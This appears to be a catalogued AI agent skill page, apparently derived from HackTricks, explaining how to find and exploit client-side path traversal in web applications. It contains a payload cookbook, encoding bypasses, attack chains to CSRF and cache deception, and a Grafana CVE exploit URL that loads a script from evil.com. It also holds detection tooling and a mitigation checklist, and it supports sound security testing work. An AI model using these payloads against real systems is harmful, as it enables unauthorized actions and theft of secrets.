OpenSkillIndex← back to search

Hacktricks-skills client-side-path-traversal

How to find and exploit Client Side Path Traversal (CSPT) vulnerabilities in web applications. Use this skill whenever the user mentions path traversal, URL manipulation, OSRF, on-site request forgery, frontend security testing, SPA vulnerabilities, or wants to test for client-side path injection attacks. This skill helps identify when user-controlled input gets concatenated into API paths, fetch requests, or router navigation that can be manipulated to access unauthorized endpoints.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/client-side-path-traversal/SKILL.MD
source content

Client Side Path Traversal (CSPT) Testing

A Client Side Path Traversal (CSPT) vulnerability occurs when you can manipulate the path of a URL that gets sent to a user's browser or is forced to visit via JavaScript/CSS. CSPT is also known as On-Site Request Forgery (OSRF) because it coerces the victim's browser into hitting arbitrary paths on the same origin with their authentication credentials.

When to Use This Skill

Use this skill when:

  • Testing Single Page Applications (SPAs) for path manipulation vulnerabilities
  • Investigating route parameters that get concatenated into fetch() or XHR paths
  • Analyzing stored values (profile slugs, document IDs) interpolated into paths
  • Reviewing UI gadgets (download/export buttons, image galleries) that append user-controlled fragments
  • Chaining vulnerabilities (CSPT → CSRF, CSPT → Cache Deception, CSPT → Open Redirect)
  • Testing for web cache poisoning via path traversal
  • Auditing frontend API wrappers, history.pushState, or router.navigate helpers

Hunting Workflow

Step 1: Identify Sources (Data You Control)

Look for these common source patterns:

Route Parameters:

  • React Router dynamic routes (
    /users/:id
    )
  • Next.js dynamic routes (
    pages/users/[id].js
    )
  • Vue router params
  • Angular 
    ActivatedRoute

Stored Values:

  • Profile slugs in localStorage/IndexedDB
  • Document IDs in state management
  • Feature flag payloads
  • CMS content that gets interpolated into paths

UI Gadgets:

  • Download/export buttons
  • Image galleries
  • File extension appenders
  • API endpoint builders

Step 2: Identify Sinks (Where Traversal Lands)

Frontend API Wrappers:

// Vulnerable pattern
fetch(`/api/${userId}/profile`)

// Also check for:
- /proxy/ prefixes
- Auth header reuse
- Automatic credential inclusion

Router Helpers:

  • history.pushState()
  • router.navigate()
  • URL reconstruction during hydration

CSS/Resource Loading:

  • <link>
    tags from CMS content
  • <style>
    imports
  • @import
    statements

Step 3: Test for Exploitation

Use the payload patterns below to test identified source-sink pairs. Start with simple traversal and escalate to chained attacks.

Payload Cookbook

Basic Traversal Patterns

GoalPayloadWhen to Use
Hit sibling API
?doc=../../v1/admin/users
Simple path concatenation
Force open redirect
?next=..%2f..%2f..%2flogin/callback/%3FreturnUrl=https://attacker.tld/x
With trusted redirectors
CDN cache abuse
?file=../../v1/token.css
When CDN caches static-looking assets
CSRF via verb change
?action=../../payments/approve/.json&_method=POST
With _method override support

Encoding Variations

Test these variations as different routers normalize differently:

..;/
%2e%2e/
%2e./%2e/
%252e%252e/  (double-encoded)
UTF-8 homoglyphs
; (matrix params)

Suffix Tricks for Cache Deception

Add these extensions to trigger CDN caching:

  • .css
  • .js
  • .json
  • .jpg
  • .png

Attack Chains

CSPT → CSRF/OSRF

  1. Find a path parameter that controls API endpoint
  2. Inject traversal to escape intended resource
  3. Re-enter sensitive endpoints (password reset, payment approval)
  4. Combine with CSRF checklist for escalation

Example:

Original: /api/users/{id}/settings
Exploited: /api/users/../../admin/users/{id}/delete

CSPT → Cache Deception/Poisoning

  1. Find SPA code building API URLs from path parameters with auth headers
  2. Identify sensitive endpoints
  3. Test static suffixes to see if CDN caches with 
    Cache-Control: public
  4. Lure victim to URL with traversal injection
  5. Read back cached URL anonymously

Example:

Victim visits: /app?file=../../../v1/token.css
CDN caches: /v1/token.css (authenticated response)
Attacker reads: /v1/token.css (gets cached secret)

CSPT → Open Redirect → XSS/SSRF

  1. Traversal lands on open redirect endpoint
  2. Redirect bounces to attacker infrastructure
  3. Attacker serves malicious JS or SSRF payloads

Tooling

Automated Discovery

CSPT Burp Extension:

  • Parses proxy history
  • Clusters parameters reflected in request paths
  • Reissues proof-of-concept URLs with canary tokens
  • Set 
    Source Scope
    to client parameters (id, slug)
  • Set 
    Sink Methods
    to GET, POST, DELETE

Eval Villain Browser Extension:

  • Monitors all data attacker can control
  • Tracks sinks where data ends up
  • Available for Firefox

Manual Instrumentation

Add this to DevTools Console to surface hidden traversals:

(() => {
  const origFetch = window.fetch;
  window.fetch = async function (input, init) {
    if (typeof input === "string" && /\.\.\//.test(input)) {
      console.log("[CSPT candidate]", input, init?.method || "GET");
      debugger;
    }
    return origFetch.apply(this, arguments);
  };
  
  // Also wrap XMLHttpRequest
  const origOpen = XMLHttpRequest.prototype.open;
  XMLHttpRequest.prototype.open = function(...args) {
    if (typeof args[1] === "string" && /\.\.\//.test(args[1])) {
      console.log("[CSPT candidate XHR]", args[1], args[0]);
    }
    return origOpen.apply(this, args);
  };
})();

Practice Environment

Use the CSPT Playground to:

  • Practice chaining traversal → CSRF → stored XSS
  • Reproduce target router structure locally
  • Craft shareable PoCs

Case Study: Grafana CVE-2025-4123

Vulnerability: Traversal gadget in 

/public/plugins/
allowed smuggling 
../../
into plugin asset loader.

Chain:

  1. Traversal in plugin path
  2. Chained with Grafana's open redirect
  3. Forced victims to load attacker-controlled plugin bundles
  4. With Image Renderer plugin: SSRF to internal hosts

Exploit URL:

https://grafana.example.com/public/plugins/../../../../..//evil.com/poc/module.js

Impact: XSS + SSRF from single traversal primitive

Mitigation Checklist

When reporting or fixing:

  • Validate and sanitize all path parameters before concatenation
  • Use allowlists for route parameters
  • Avoid direct string concatenation in URL building
  • Implement proper path normalization
  • Set 
    Vary: Authorization
    header on cached responses
  • Use framework routing instead of manual path construction
  • Test plugin asset paths and renderer endpoints together

Quick Start Script

Run the payload generator script to create test cases:

python scripts/generate_cspt_payloads.py --target "<endpoint>" --param "<parameter_name>"

This generates a comprehensive list of traversal payloads tailored to your target.

References